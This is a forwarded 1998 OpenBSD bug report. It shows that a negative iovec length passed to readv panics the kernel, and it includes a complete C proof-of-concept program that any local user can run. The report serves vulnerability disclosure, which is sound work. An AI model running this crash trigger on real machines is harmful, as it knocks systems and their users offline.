Date: Mon, 27 Jul 1998 11:23:59 -0600
From: Michael Fuhr <mfuhr@DIMENSIONAL.COM.>
To: [email protected]
Subject: Fwd: Any user can panic OpenBSD machine
-----Forwarded message from [email protected]
Message-Id: <199807271126.MAA16724@chalk.oaktree.net.uk.>
Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
From: [email protected]
To: [email protected]
X-Send-Pr-Version: 3.97
Subject: kernel/549: Any user can panic OpenBSD machine
Sender: [email protected]
>Number: 549
>Category: kernel
>Synopsis: readv with -ve block size panics kernel
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: bugs
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon Jul 27 05:40:02 MDT 1998
>Last-Modified:
>Originator: Jon Ribbens
>Organization:
\/ Jon Ribbens / [email protected]
>Release: 2.3
>Environment:
System : OpenBSD 2.3
Architecture: OpenBSD.i386
Machine : i386
>Description:
readv with one of the blocks having a -ve size panics the kernel.
Oops.
>How-To-Repeat:
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

int main(void) {
    struct iovec iov[1];
    char buffer[1024];

    iov[0].iov_base = buffer;
    iov[0].iov_len = -1;
    return readv(0, iov, 1);
}
Run the above program, type a few characters, press return, observe
either kernel panic or machine hang. Panic message is
"panic: ureadc: non-positive resid". Any user can do this.
>Fix:
Dunno I'm afraid.
>Audit-Trail:
>Unformatted:
-----End of forwarded message-----
--
Michael Fuhr
http://www.fuhr.net/~mfuhr/